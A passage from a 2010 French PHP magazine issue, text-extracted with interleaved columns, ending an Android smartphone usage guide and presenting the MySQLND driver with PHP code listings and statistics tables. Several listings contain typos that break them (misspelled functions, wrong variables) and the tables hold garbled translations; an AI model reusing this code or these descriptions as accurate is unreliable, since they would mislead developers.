rées. Une fois les permissions systèmes va-
lidées par vos soins, le système se charge de
télécharger et d’installer l’application et le
widget. A vous de patienter ! Toutes ces ap-
plications sont répertoriées par thèmes et
sous-thèmes :
• applications : achats, actualités et mé-
téo, communication, divertissement, fi-
nance, multimédia, outils, productivité,
référence, santé, social, sports, tendan-
ces, thèmes, voyages,
• jeux : jeux d'arcade et d'action, jeux
de cartes et casino, jeux de réflexion
et puzzles, jeux occasionnels.
Si l'application trouvée est payante, vous
devez en voir le tarif sur le haut de l'écran.
Pour le moment, en France, le paiement
se fait via Google Checkout. En bref, vous
renseignez une seule et unique fois les élé-
ments de facturation (nom, adresse cour-
riel, carte bancaire) qui seront stockés par
les services de Google. Au prochain achat
chez Android Market, vous n'aurez rien
à ressaisir pour la facturation. Évidem-
ment, si vous craigniez des abus avec un tel
système de paiement ou si vous faites par-
tie de ceux qui dénoncent les dérives hégé-
moniques de Google (C'est votre droit.), ce
concept de paiement n'est pas pour vous.
Sachez cependant que Google a mis en pla-
ce avec l'opérateur T-Mobile (USA) la pos-
sibilité de payer via l'opérateur et non plus
4/2010
 Android

via Google Checkout. Nous allons devoir

patienter quand même pour espérer que ce
nouveau concept de facturation arrive rapi-
dement chez nous. Si l'application payante
ne vous convient pas, vous disposez de 24
heures pour la désinstaller et vous faire
rembourser.
Sachez aussi que la qualité fonctionnel-
le de l'application peut varier d'un Andro-
phone à un autre. Les commentaires font
ainsi parfois état d'applications totalement
inexploitables ou d'applications faisant ra-
lentir l'appareil. N'ayez pas pour autant
d'à-priori négatif. Contrairement à l'iPho-
ne installé sur une base unique d'appareil
(et c'est la base de sa force), Android est ins-
tallé sur des machines plus ou moins diffé-
rentes (comme les PC). Le cœur de chaque
gPhone varie légèrement (processeur, taille
de la mémoire vive) ainsi que la dimension
de l'écran (certaines applications s'avèrent
inexploitables sur les écrans trop petits).
Par conséquent, lisez les commentaires
mais n'hésitez pas à installer pour tester.
Vous ne risquerez rien puisque vous pour-
rez toujours désinstaller.
Pour accéder à l'Android Market, il
faut renseigner son identifiant de l'adres-
se Gmail et son mot de passe lié. Google
garde en mémoire les informations sur les
programmes téléchargés. Cela effraiera cer-
tains mais il est bon de savoir que le fait de
changer de gPhone en réutilisant ce même
identifiant et mot de passe permet de re-
trouver toutes les applications précédem-
ment chargées via Android Market et de les
mettre à jour.
Réaliser des captures d’écrans
Si vous désirez réaliser des captures d’écrans d’Android, vous devrez passer par quelques mani-
pulations car cela n’est pas possible directement.
1. Téléchargez et installez le SDK Android à partir de http://developer.android.com/sdk/in-
dex.html.
2. Réglez l’Androphone en mode débogage USB via Paramètres / Applications / Développe-
ment / Débogage USB.
3. Branchez le gPhone sur un port USB de l’ordinateur mais sans monter la carte SD.
4. Rendez vous dans le répertoire tools situé à la racine du SDK Android pour lancer l’utili-
taire ddms.
5. Sélectionnez le device dans la partie supérieure gauche de l’écran Dalvik Debug Monitor
et appuyez sur les touches CTRL + S afin de capturer l’écran Android.
6. Cliquez sur save pour sauvegarder l’image.
7. Cliquez sur refresh pour une nouvelle capture.
• Connexions sans fil : activation ou non tions paramètres de l’appareil. Voici quel-
du Wi-Fi, du Bluetooth, choix du réseau ques pistes (widgets que j’utilise couram-
de téléphonie (2G, 3G ou automatique ment) :
selon l'utilisation),
• Gestion de la batterie : mode perfor- • 2G-3G OnOff : gratuit : passer du 2G
mance ou intelligent ou économie, au 3G et inversement très rapidement,
• Affichage et sécurité : mise en veille, lu- • BatteryLife : gratuit : affiche sur le bu-
minosité. reau le niveau de la batterie,
• Wifi ON OFF : gratuit : activer / désacti-
Il est évident que selon l'utilisation, la du- ver rapidement le Wifi,
rée de la batterie variera. Aller naviguer sur • Brightness Level : gratuit : régler facile-
internet (3G oblige) est davantage contrai- ment la luminosité.
gnant que passer un simple appel télépho-
nique. Je vous invite donc à, au moins, tes- Gestion des applications
ter certains widgets se plaçant sur le bureau, Pour désinstaller une application, vous avez
qui sont de fait des raccourcis vers les fonc- deux possibilités.

Astuces diverses, gestion

de votre forfait
Avant toute chose, adaptez préalablement
votre abonnement téléphonique à votre fu-
ture utilisation sous peine de vous arracher
les cheveux devant une facture au montant
astronomique ! Le simple fait de vous ren-
dre sur Android Market revient à aller sur
…. internet. Donc l’élémentaire règle de pru-
dence implique que votre forfait comprenne
la navigation sur internet en illimité. Pensez
aussi aux courriels : relever sa messagerie
électronique avec un smartphone n’est pas
englobé dans la navigation internet. Pour les
fournisseurs de téléphonie, internet et cour-
riels sont deux activités totalement différen-
tes avec deux options aussi différentes. Je ne
vais pas me pencher plus en détail sur ce su-
jet trop complexe. Je vous invite fortement à
voir cela avec votre propre fournisseur de té-
léphonie.

Gestion de la batterie
Pour faire durer la batterie, vous pouvez ré- Figure 5. Le Nexus One, fabriqué par HTC mais Figure 6. Le Samsung Galaxy Spica
gler les paramètres de l’Androphone : vendu directement par Google

www.phpsolmag.org 37
 Pratique
Figure 7. Le bureau Android du Motorola Dext
• Passer par le Market : passez par l’icô-
ne Android Market pour choisir en-
suite Mes téléchargements. Sélectionnez
l’application puis appuyer sur le bou-
ton Désinstaller. Notez qu’après le délai
de 24 heures, l’application payante est
simplement désinstallée sans rembour-
sement.
• Passer par les paramètres de l'appareil :
choisissez la rubrique Applications puis
Gérer les applications. Sélectionnez l’ap-
plication pour appuyer sur le bouton
Désinstaller.
Pour mettre à jour les applications chargées
via Android Market, passez par le Market où
38
la rubrique Mes téléchargements affiche toutes
les mises à jour disponibles en tête. Il suffit
de choisir une fiche applicative puis cliquer
sur le bouton Mettre à jour.
Connecter à un PC
Pour transférer des fichiers de votre Andro-
phone vers votre ordinateur (et en sens in-
verse), il suffit de connecter (dans l’ordre
suivant) le gPhone au câble USB fourni avec
l’appareil (celui qui sert peut-être aussi à re-
charger la batterie) puis de le brancher à l’or-
dinateur. Ensuite, il faut aller dans la barre
de notification pour sélectionner Connecter
à l’aide d’un câble USB et cliquer sur Monter.
C’est aussi simple !
Du côté de GNU/Linux, la connexion est
rapide puisque le système GNU/Linux re-
connaît nativement le téléphone Android
comme un nouveau périphérique au systè-
me de fichier VFAT. Pour Windows, je dois
avouer qu’après une impossibilité de recon-
naissance (un seul essai de connexion), j’ai
découvert également une reconnaissance
du périphérique automatique (comme
système de fichier FAT32) sans avoir rien
fait (Windows Vista SP2). Une mise à jour
ou un mauvais jour ? Je ne possède pas de
machine Mac pour tester cette faculté.
Veuillez notez que c’est la micro carte SD
de l’Androphone qui est montée (connec-
tée) et non le système Android dans sa glo-
balité.
Pour déconnecter, il faut démonter la mi-
cro carte. Il existe deux façons de procéder.
• Méthode Android : Allez dans les no-
tifications pour sélectionner Éteindre
le périphérique de stockage, demande
qu’il faudra confirmer en choisissant
le bouton Éteindre. Notez que le ter-
me Éteindre est mal choisi (mauvaise
traduction ?) dans la mesure où l’An-
drophone est simplement déconnecté
en douceur et demeure encore allumé.
Une autre méthode de déconnexion
trop hâtive risquera d’abîmer la micro
carte.
• Méthode PC : Procédez comme lorsque
vous déconnectez un classique péri-
phérique USB (tel une clef). Pour Win-
dows, à côté de l’horloge, via l’icône
Supprimer en toute sécurité. Pour GNU/
Linux, sous KDE4, via Dolphin, le pan-
neau Emplacement affiche le gPhone
comme Volume (vfat). Supposant que
vous avez déjà double cliqué pour en
afficher le contenu, il suffit de faire un
clic droit sur Volume (vfat) pour ensui-
te sélectionner Retirer en toute sécurité
Volume (vfat).
Si Windows ne reconnaît pas votre gPhone,
rendez-vous sur la page http://developer.an-
droid.com/sdk/win-usb.html pour télécharger
le pilote Windows (compatible uniquement
avec Vista et XP. La page explique comment
procéder.
Ajouter et supprimer widget
et raccourci sur le bureau
Pour ajouter un widget ou un raccourci, ap-
puyez longuement sur un emplacement vide
du bureau pour sélectionner ensuite Widget
ou Raccourcis, ou Dossiers. Pour le suppri-
mer, appuyez longuement sur l’élément dé-
siré puis, dès qu’une corbeille apparaît en bas
et au milieu de l’écran, faites le glisser vers
cette corbeille.
4/2010

Personnalisation
Comme pour GNU/Linux, Android per-
met de personnaliser son système. J’évo-
que davantage la personnalisation du bu-
reau que celle des sonneries. Et plus que le
simple choix d’un fond d’écran, c’est l’en-
vironnement de bureau lui même qui est
possible via diverses applications comme
Open Home, PandaHome, aHome … Soyez
cependant vigilant au fait que certaines de
ces applications pourraient ralentir votre
machine voire même vider rapidement la
batterie.
Conclusion
Investir dans Android permet à Google de
renforcer ses positions sur la maîtrise des
services liés à internet puisqu’un smartpho-
ne peut par nature aller sur le web. A la li-
mite, ce n’est pas là notre affaire en tant que
consommateur de téléphonie. Ce qui nous
intéresse avant tout est l’aspect pratique du
smartphone, ses possibilités et sa philoso-
phie. L’aspect pratique est une affaire de
goût mais gageons qu’il ne peut que s’amé-
liorer puisque Google a réussi à fédérer
dans l’Open Handset Alliance des construc-
teurs. Les possibilités devraient également
s’étendre puisque le catalogue logiciel gros-
sit somme toute assez vite et est déjà assez
conséquent. La philosophie Android : c’est
là le point noir, du moins pour certains : du
GNU/Linux partiel un peu contraignant
et l’appétit de Google qui effraie. Pour ceux
qui dénoncent la voracité de Google, le sa-
lut n’est point non plus du côté d’Apple et
de Microsoft. Mais Android, c’est aussi et
déjà une formidable communauté (dont 7
sites francophones).
Sans verser dans le sectarisme, faisons
une brève comparaison entre Android
et d’autres systèmes d’exploitation pour
smartphone tels que iPhone et Windows
Mobile / Windows Phone (les plus connus).
Android est sous licence libre (licences Apa-
che 2.0 et GPL2) avec code source ouvert
Figure 8. La mascotte du projet Android
www.phpsolmag.org
Android
Sur Internet
• http://fr.wikipedia.org/wiki/Smartphone – Les smartphones,
• http://fr.wikipedia.org/wiki/Android – Android,
• www.openhandsetalliance.com – Open Handset Alliance,
• www.android.com – Site officiel,
• http://developer.android.com/ – Android Developers,
• http://android-france.fr/2009/11/27/android-est-il-un-systeme-linux/ – Linux ou pas,
• http://market.android.com – Android Market,
• www.frandroid.com – FrAndroid : la référence francophone,
• http://android-france.fr – Android France,
• www.planete-android.com – Planète Android,
• www.pointgphone.com – Point Gphone,
• http://gphone.news.free.fr – Android Gphone News,
• www.sosandroid.fr – SOS Android,
• www.android-software.fr – Android Software,
• http://fr.androidzoom.com – AndroidZoom,
• http://fr.androlib.com – AndroLib,
• www.widgetvalley.com – Widget Valley.
(Open Source) alors que les deux autres prochaine mouture d’Android, c’est à dire
sont sous licence propriétaire avec un code Android Froyo 3.0..
source fermé. Vous pouvez personnaliser Pour terminer, sachez que le concept du
sans restriction les bureaux d’un Andro- mutitouch étant breveté par Apple, et bien
phone et d’un Windows Phone alors qu’il que le matériel Androphone possède désor-
faudra jailbreaker, c’est à dire casser la pro- mais nativement cette faculté dans les nou-
tection (à vos risques et périls), pour parve- velles versions d’Android, cette fonction de-
nir au même but sur un iPhone. Par contre, meure encore inactivée par défaut dans un
beaucoup de constructeurs assemblent de souci juridique. Souhaitons que l’affaire se
multiples modèles de smartphones sous débloque rapidement d’autant que certains
Android et Windows Mobile / Windows développeurs parviennent déjà à implémen-
Phone tandis que l’iPhone n’est proposé ter le multitouch.
que par un seul constructeur (Apple). Au Quant aux androphones, inutile d’en dres-
niveau de la richesse des applications dis- ser ici la liste. Sachez simplement que les fa-
ponibles, iPhone prend la tête du classe- bricants qui misent sur Android sont (par
ment, suivi par Android et Windows Mo- ordre alphabétique) HTC, LG, Motorola,
bile / Windows Phone arrive en troisième Samsumg. De plus, la firme Google a fait fa-
position. Toutes les applications proposées briquer par HTC son fameux gPhone et le
dans l’App Store doivent respecter les obli- commercialise directement sous le nom de
gations dictées par Apple (Certains refus de Nexus One. Selon ce même schéma, Google
distribution dans l’App Store font d’ailleurs devrait à terme vendre le Nexus Two fabriqué
rager, tel le refus d’Opera Mini entrant en par Motorola.
concurrence avec Safari.). Ces restrictions
pouvant être considérées par certains com-
me une forme de censure n’existent pas
sur Android et Windows Mobile / Win-
dows Phone. Mais si vous désirez impéra-
tivement la fonction multitouch (exemple :
agrandir une page en utilisant deux doigts
simultanément), ce sera obligatoirement
l’iPhone.
Du côté des mises à jour du système An-
droid, d’après le blog américain Engadget, THIERRY BOREL
Google souhaiterait assouplir les contrain- Passionné d’informatique (et d’histoire) mais
tes dues aux versions du système. Ainsi, entièrement autodidacte, il est devenu à for-
pour ne plus être tributaire d’une version ce de patience et persévérance l’un des modé-
minimale précise du système Android, rateurs du site d’entraide informatique http://
l’idée est de désolidariser les applications www.commentcamarche.net. Touché défini-
du système. Dans la même idée de sou- tivement par la grâce du logiciel libre depuis
plesse, l’Android Market devrait proposer près de deux ans, il expérimente tout ce qui
à terme et directement les mises à jours du se rapporte à GNU/Linux de façon à aider les
système Android, et cela à compter de la autres.
39
 Fiche technique

MySQLND :
une économie de ressources
L’optimisation et la gestion des ressources sont des
points importants dans le milieu du développement
et ce sont souvent des points mal évalués du coté
des connexions vers le serveur.

A noter que MEMORY_LIMIT peut être tou-

Cet article explique : Ce qu’il faut savoir : jours utilisé et s’appliquera aux connecteurs
• Stats. • PHP 5.3. utilisant cette bibliothèque. Ce gain de cycles
• Consommation mémoire. • MySQLi. CPU va réduire le trafic réseau, ce qui est uti-
le pour les sites à fort trafic.

c’est-à-dire que lors des différentes évolutions
de PHP, ce driver sera automatiquement mis
Niveau de difficulté à jour.
Le gain du mode natif permet d’éviter une
compilation supplémentaire causé par un
composant externe comme libmysql. Utiliser
Maintenance
Comme l’ensemble des langages informatiques,
PHP évolue différemment en fonction de :
• L'apparition de nouvelles fonctionnalités.
• Différents points de sécurités ou correctifs.
Le langage PHP ne dépend plus de la librai-

L
e langage PHP est souvent associé à la
base de données MySQL et initiale-
ment un nouveau driver devait voir
le jour avec la sortie de PHP 6. Les choix et
les orientations ont modifié la date de sortie
de celui-ci.
C'est avec la sortie de PHP 5.3 que l'évolu-
tion est apparue au niveau de la relation en-
tre PHP et MySQL. Il s'agit d'un nouveau dri-
ver appelé MySQLND qui veut dire MySQL
Native Driver. Ce nouveau driver va apporter
énormément de changement et d’évolution,
dont l’article vous montrera un aperçu des
nouvelles possibilités qui vous sont offertes.
MySQLND va vous permettre d’obtenir de
nombreux avantages en terme de :
• Performances mémoires.
• Maintenance.
• Nouvelles fonctionnalités.
Les performances mémoires
MySQLND a été réalisé pour s’intégrer et
pour fonctionner avec PHP, et par consé-
quent elle passe par le gestionnaire de mémoi-
re du Zend Engine. Ainsi, vous obtenez une
meilleure gestion de l’allocation de la mémoi-
re et donc un gain en terme de cycles CPU.
rie libmysql, c’est-à-dire qu’il n’est plus néces-
saire d’installer un composant externe pour
parvenir à compiler PHP. C’est pourquoi la
maintenance a été facilitée. Comme l’article
spécifié un peu plus haut, la bibliothèque
MySQLND sera mise à jour en même temps
que PHP et donc un gain de temps mais aussi
une préoccupation en moins.
Bien entendu, si celui-ci est intégré, il se-
ra uniquement utilisé par PHP, ce qui per-
met d’éviter avoir des risques d’erreurs ou de
conflits lorsqu’une librairie est utilisée par
une autre application comme cela pouvait
l’être avec libmysql.

Présentation
MySQLND est une bibliothèque dévelop-
pée par MySQL spécifiquement pour PHP,
par conséquent il ne s’agit pas d’un nouveau
connecteur et il n’a pas pour but de rempla-
cer les trois solutions qui existent : MySQL,
MySQLi ou PDO_mysql. Elle a le rôle de so-
cle commun, c’est-à-dire qu’elle ne sera pas vi-
sible directement par le développeur. Mais ce
point sera vu un peu plus loin.
Le driver MySQLND est une bibliothèque
réalisée en langage C et remplace l’ancienne
librairie libmysql. Ce driver est maintenant
intégré avec la version de PHP 5.3 en natif, Figure 1. Différences entre les librairies

40 4/2010
 MySQLND

Schématiser
Le basculement de libmysql vers MySQLND, Listing 1. Connexion persistante
n’est pas visible pour les développeurs mais le <?php
comportement va être différent. Quand on
utilisait la librairie libmysql, le jeu de résultat $host="p:localhost";
$port=3306;
d’une requête était stocké en mémoire. À cha- $socket="/tmp/mysql.sock";
que boucle vous tapiez dans ce résultat pour $user="root";
créer de nouvelles variables. Elle faisait appel $password="password";
$dbname="test";
aux données sous la forme d’un tableau avec
l’aide d’un script PHP. $cnx = new mysqli($host, $user, $password, $dbname, $port, $socket)
or die ('On ne peut pas se connecter au serveur de base de données' .
Avec MySQLND, c’est différent, les don- mysqli _ connect _ error());
nées ne sont plus appelés à chaque boucle car
vos variables PHP pointent directement vers $cnx = close;
une adresse mémoire de votre jeu de résultat ?>
MySQL à utiliser. Ce changement permet
d’éviter des doublons et va permettre d’éco- Listing 2. Statistiques sur le client
nomiser une partie de la mémoire.
<?php
En un mot avec libmysql comme exten- $cnx = mysqli _ connect("localhost","root","","mysql");
sion, l’appel mémoire était effectué une fois
echo "<pre>";
pour stoker les données par la librairie et une print _ r(mysqli _ get _ client _ stats());
fois par PHP. Avec MySQLND, elles ne sont echo "</pre>";
plus stockées qu’une seule fois comme vous
?>
pouvez le voir sur la Figure1 (Différences en-
tre les librairies). Ce graphique a été présenté Listing 3. Statistiques sur le cache du client
et réalisé par Andrey Hristov à la conférence
PHP Vikinger en juin 2007 <?php
$cnx = mysqli _ connect("localhost","root","","mysql");
Comme le montre ce dernier, vous pou-
vez voir le nombre de Ko consommés lorsque echo "<pre>";
print _ r(mysqli _ get _ cache _ stats());
vous utilisez des requêtes. La théorie montre echo "</pre>";
que cela va du simple au double, mais en pra-
tique ce sera différent car d’autres critères ?>
sont à prendre en compte comme des tests de
Listing 4. Statistiques sur la connexion
sécurité ou de validité qui peuvent être plus
ou moins long. <?php
$cnx = mysqli _ connect("localhost","root","","mysql");

Les nouveautés echo "<pre>";

Les nouveautés sont assez nombreuses au ni- print _ r(mysqli _ get _ connection _ stats($cnx));
echo "</pre>";
veau des informations avec très peu de nou-
velles fonctions. Les points principaux sont : ?>

• Connexion persistantes. Listing 5. L'ensemble des indications

• Statistique. <?php
• La ligne directrice. echo phpinfo();
?>

L'ensemble de ces points sera détaillé dans les Listing 6. Test de connexion
lignes qui vont suivre car elles exploitent au
maximum cette nouvelle librairie. <?php

if (mysqli _ get _ client _ version()>"50005")

Connexion persistante
Lorsque MySQLND a été validé et inséré
avec PHP, il a permis de voir le retour des
connexions persistantes qui avait été stop-
pées avec le connecteur MySQLi. Ce retour
des connexions persistances est apparu sui-
te à la résolution de la stabilité et des perfor-
mances de celui-ci. Son utilisation s’effectue
comme le montre le Listing 1 (connexion
persistante)
die ("Mauvaise version de la librairie de MySQL");
if (phpversion()>='5.3') {
echo "Désactive le collecteur de références circulaires<br>";
gc _ disable();
}
// connection vers le serveur de données
$cnx = mysqli _ connect('localhost','root', '','mysql')
or die("Impossible de se connecter : " . mysqli _ connect _ error());
// Ici test bytes _ sent et bytes _ retreived
echo "Info serveur : ".mysqli _ get _ server _ info($cnx)."<br>";

Statistiques // ici suite de la page

Grâce aux nouvelles possibilités qui vous mysqli _ close($cnx);
sont offertes, les statistiques vont permettre ?>
d’obtenir des informations supplémentaires,

www.phpsolmag.org 41
 Fiche technique

Zval et se décompose de la même façon que la

Listing 7. Connexion sécurisée fonction précédente (Listing 3).
<?php
Mysqli_get_connection_stats
$cnx = mysqlii _ init();
La fonction mysqli_get_connection_stats() re-
$cnx->ssl _ set('server-key.pem','server-cert.pem','cacert.pem',NULL,NULL); tourne des statistiques touchant la connexion
(Listing4). Toutes les lignes de résultat obte-
$cnx->real _ connct('localhost','root','','mysql');
nues ont une signification qui vous est ex-
// Ici vos requêtes pliquée dans le Tableau 2 statistiques sur la
connexion. Grâce à ces 3 nouvelles fonctions,
$cnx->close();
les statistiques de performances sont très uti-
?> les pour identifier les goulets d’étranglement
de performances.
Listing 8. Cache requete

<?php La ligne directrice

$cnx = mysqli _ connect("localhost","root","","mysql"); Avant de se connecter à la base de données,
$query = "SELECT name, parent _ category _ id FROM help _ category ";
certains tests doivent être effectués pour être
if ($stmt = mysqli _ prepare($cnx, $query)) certain que le serveur réponde correctement
{ aux différents critères de la librairie MyS-
mysqli _ stmt _ execute($stmt); // Execution de la requete
QLND et de PHP.
mysqli _ stmt _ store _ result($stmt); // stock le résultat Les tests de vérification permettent de:
echo "Nombre de lignes : ".mysqli _ stmt _ num _ rows($stmt)."<br>";
• Vérifier l'efficacité de la compression de
mysqli _ stmt _ free _ result($stmt); // libère le résultat protocole.
• Vérifier si PHP se connecte bien à MyS-
mysqli _ stmt _ close($stmt); // Fermeture de la requête
} QL.
• Vérifier si PHP utilise au moins une ver-
mysqli _ close($cnx); // Fermeture de la connexion sion 5.3 et la bonne librairie.
?>

Listing 9. mysqli_fetch_all Pour les effectuer, vous pouvez consulter le

Listing 6 (test de connexion) qui montre une
<?php
$cnx = mysqli _ connect("localhost","root","","mysql");
approche de quelques tests de vérification.

$sql="SELECT name, parent _ category _ id FROM help _ category ";
$req=mysqli _ query($cnx,$sql);
$row=mysqli _ fetch _ all($tmp);
echo "<pre>";
print _ r ($row);
echo "</pre>";
mysqli _ free _ result($req);
mysqli _ close($cnx);
?>
comme vous étiez obligé de le faire sous dif-
férentes manières dans les versions précé-
dentes. Maintenant les fonctions disponibles
sont :
• mysqli _ get _ client _ stats,
• mysqli _ get _ connection _ stats,
• mysqli _ get _ cache _ stats.
Ces fonctions sont disponibles avec l’exten-
sion MySQLi (ext/mysqli) et seulement pour
MySQLND. Par ailleurs, quelque soit la fonc-
tion utilisée, celle-ci retournera le même type
de tableau. Le contenu de celle-ci se présente
sous la forme d’une clé et d’une valeur com-
me ceci :
• Nom de la statistique = clé.
• Donnée statistiques = valeur.
Mysqli_get_client_stats
La fonction mysqli_get_client_stats()
permet de retourner des statistiques sur le
client dans un tableau associatif et se pro-
gramme comme le montre le Listing 2 statis-
tiques sur le client. Pour obtenir le résultat de
l’image 2 statistiques sur le client.
Le résultat obtenu est identique à la fonc-
tion phpinfo() (Listing 5) dans la partie mys-
qlnd. Seulement, elles sont spécifiques sur le
client par processus et surtout un bon moyen
pour optimiser vos scripts. Chaque ligne de
résultat obtenue a une signification qui est
expliquée dans le Tableau 1 statistiques sur le
client.
Mysqli_get_cache_stats
La fonction mysqli_get_cache_stats() re-
tourne les statistiques sur le cache du client
Fonction sécurisée
Depuis que MySQLND existe et surtout se trou-
vant associé à PHP, il était nécessaire de pouvoir
proposer des connexions sécurisées. Mainte-
nant c’est possible avec la fonction suivante :
mysqli_ssl_net : établir une connexion sé-
curisée avec SSL.
Cette fonction existe depuis la version de
PHP 5.3.2 et les extensions telles que ext/mys-
ql, ext/mysqli, PDO_MySQL qui sont confi-
gurées pour utiliser le pilote natif MySQL
peuvent tirer parti de ce protocole. Le prin-
cipe d’utilisation est montré dans le Listing 7
(connexion sécurisée).
Système de cache de requête
MySQLND propose une autre évolution
pour afficher des requêtes et donc gagner du
temps machine. Un nouveau concept de ca-
che requête a été introduit du coté client. Il
s’agit de pouvoir stocker le résultat des requê-
tes dans une zone de tampon. Le jeu de résul-
tats obtenu, est enregistré et stocké du côté
client, c’est-à-dire qu’après l’éxécution d’une
requête, l’ensemble des résultats sont récu-
pérés du serveur MySQL et mis en cache côté
client. L’avantage au niveau du résultat mis
en tampon, autorise le serveur à libérer des

42 4/2010

Tableau 1. Statistiques sur le client
nom
bytes_sent, bytes_retreived
packets_sent, packets_received
protocol_overhead_in, protocol_overhead_out
bytes_received_ok_packets, packets_received_ok
bytes_received_eof_packets, packets_received_eof
bytes_received_rset_header_packet, packets_
received_reset_header
bytes_received_rset_field_meta_packet, packets_
received_rset_field_meta
bytes_received_rset_row_packet, packets_
received_rset_row
bytes_received_prepare_response_packet,
packets_received_prepare_response
bytes_received_change_user_packet, packets_
received_change_user
packets_sent_command
Class: result set
result_set_queries
non_result_set_queries
no_index_used
bad_index_used
slow_queries
buffered_sets
unbuffered_sets
ps_buffered_sets
ps_unbuffered_sets
flushed_normal_sets, flushed_ps_sets
ps_prepared_never_executed
ps_prepared_once_executed
rows_fetched_from_server_normal, rows_fetched_
from_server_ps
rows_buffered_from_client_normal, rows_
buffered_from_client_ps
rows_fetched_from_client_normal_buffered, rows_
fetched_from_client_ps_buffered
rows_fetched_from_client_normal_unbuffered,
rows_fetched_from_client_ps_unbuffered
rows_fetched_from_client_ps_cursor
rows_skipped_normal, rows_skipped_ps
copy_on_write_saved, copy_on_write_performed
explicit_free_result, implicit_free_result
proto_text_fetched_**
proto_binary_fetched_ ***
www.phpsolmag.org
MySQLND
Données
Trafic entrant et sortant à partgir de PHP pour MySQL
Trafic sortant à partir de PHP pour MySQL
Trafic entrant et sortant: à partir de PHP pour MySQL.
Trafic entrant: à partir de MySQL pour PHP.
Trafic entrant: à partir de MySQL pour PHP.
Trafic entrant: à partir de MySQL pour PHP. Seulement utile pour le débogage CS
application du Protocole.
Trafic entrant: à partir de MySQL pour PHP. Seulement utile pour le débogage CS
application du Protocole.
Trafic entrant: à partir de MySQL pour PHP. Seulement utile pour le débogage CS
application du Protocole.
Trafic entrant: à partir de MySQL pour PHP. Seulement utile pour le débogage CS
application du Protocole.
Trafic entrant: à partir de MySQL pour PHP. Seulement utile pour le débogage CS
application du Protocole.
Trafic sortant: à partir de PHP pour MySQL. Seulement utile pour le débogage CS
application du Protocole.
Information sur les jeux de résultat.
Mesure indirecte pour le nombre de requêtes PHP a envoyée à MySQL (Fonction SELECT,
SHOW)
mesure indirecte pour le nombre de requêtes PHP a envoyée à MySQL (fonction INSERT,
UPDATE, LOAD DATA, SHOW.)
Nombre de requêtes qui ont généré un ensemble de résultats, mais ne pas utiliser un index
Nombre de requêtes qui ont généré un ensemble de résultats et ne pas utiliser un bon
index
instructions SQL qui a pris plus de long_query_time secondes pour exécuter et exigeait au
moins min_examined_row_limit lignes qui doivent être examinés.
Nombre de résultat SQLite ensembles retourné par «normal» dans les requêtes
Nombre de résultat unbuffered ensembles retourné par «normal» dans les requêtes.
Nombre de résultat SQLite corps restitués par les déclarations préparées.
Nombre de résultat unbuffered corps restitués par les déclarations préparées.
Nombre d’ensembles de résultats à partir de «normal» dans les requêtes et déclarations
établis avec des données non lus qui ont été écrites en silence pour vous.
Nombre de déclarations préparées, mais jamais exécutée.
Nombre de déclarations préparées exécuté seul.
Nombre total de lignes du résultat définie avec succès récupéré depuis MySQL
Nombre total de lignes correctement tamponné provenant d’une requête «normale» ou
une déclaration préparée
Nombre total de lignes lues par le client à partir d’un résultat SQLite
Nombre total de lignes lues par le client d’un résultat sans tampon créées par une
requête «normale» ou une déclaration préparée.
Nombre total de lignes chercher par le client à partir d’un curseur créé par une déclaration
préparée.
nombre de lignes ignorés lors de rinçage un jeu de résultats.
retourné par le point d’extensions en mysqlnd tampons réseau interne résultat
un processus de connexion (seulement pendant le nettoyage déclaration préparée).
Nombre total de colonnes d’un certain type récupéré un requête query
Nombre total de colonnes d’un certain type récupéré depuis une requête préparée
43
 Fiche technique

Tableau 2. Statistiques sur la connexion

Nom données
connect_success, connect_failure Nombre total de réussite / échec tentative de connexion
reconnect Nombre total d’(real_) relient les tentatives faites sur une connexion déjà ouvert manche.
pconnect_success Nombre total de tentatives de connexion réussies persistante
active_connections Nombre total de connexions actives persistants et non persistants
active_persistent_connections Nombre total de connexions actives persistante
explicit_close Nombre total de connexions explicitement fermée
implicit_close Nombre total de connexions implicitement fermé
disconnect_close Les échecs de connexion indiqué par l’API C Appel
in_middle_of_command_close ne connexion a été fermée au milieu d’une exécution de commande
init_command_executed_count Nombre total de commandes d’initialisation
init_command_failed_count Nombre de commandes n’a pas init.
explicit_stmt_close, implicit_stmt_close Nombre total d’états proches de préparation
mem_emalloc_* A utiliser seulement en développement: la mémoire des appels de gestion.
command_buffer_too_small Nombre d’extensions du réseau buffer lors de l’envoi des commandes à partir de PHP pour
MySQL.

ressources allouées à un jeu de résultat, dès
que ceux-ci ont été récupérés par le client.
Par contre, vous pouvez ne pas vouloir met-
tre le jeu de résultats en tampon et donc les
conserver plus longtemps sur le serveur, ce
qui vous contraint d’augmenter la charge sur
le serveur. Hors, il est important de ne pas
perdre de vue, qu’il est plus facile d’avoir les
informations mémorisées dans le tampon car
le client peut s’adapter plus facilement par
rapport aux serveurs.
Pour réaliser cette opération, il est préfé-
rable d’utiliser dans un premier temps les
requêtes préparées pour éviter les risques de
problèmes et pour remplir la zone tampon.
Vous pouvez utiliser la fonction mysqli_
stmt_store_result() qui vous permet d’ac-
tiver la mise en tampon des résultats comme
le montre le Listing 8 (cache requête). Le ré-
sultat que vous obtenez est de 38.
Dans notre exemple, pour envoyer le jeu de
résultats dans la zone tampon, d’autres fonc-
tions sont nécessaires :
• mysqli _ stmt _ execute : exécute une
requête préparée.
• mysqli _ stmt _ store _ result : stocke
un jeu de résultats depuis une requête
préparée.
• mysqli _ stmt _ close : termine une re-
quête préparée.
Tableau 3. Fonctions MySQLND et alias
Fonctions MySQLND
mysqli_stmt_execute
mysqli_stmt_store_result
mysqli_stmt_close
Ces fonctions existent depuis de nombreu-
ses versions et sont maintenant devenues
des alias depuis l’apparition de ces nouvelles
fonctions, comme le montre le Tableau 3.
Ces alias sont à éviter car dans les prochai-
nes versions de PHP, elles vont disparaître.
Fonction supplémentaire
Lors de la manipulation de jeu de données,
vous devez pouvoir traiter les données en une
seule fois. Une nouvelle fonction a été déve-
loppée pour le driver MySQLND.
mysqli_fetch_all : lit toutes les lignes de ré-
sultats dans un tableau
Cette fonction va permettre de répondre à
un besoin supplémentaire car elle retourne
en seule fois les lignes de résultat dans un ta-
bleau. Pour utiliser la fonction, vous pouvez
voir le Listing 9 (lecture de toutes les lignes d’un
tableau). Cette fonction va consommer plus
de mémoire que la fonction comme mysqli_
fetch_array() mais vous sera utile seule-
ment pour envoyer le jeu de données vers
une autre interface pour être analysé.
Licence
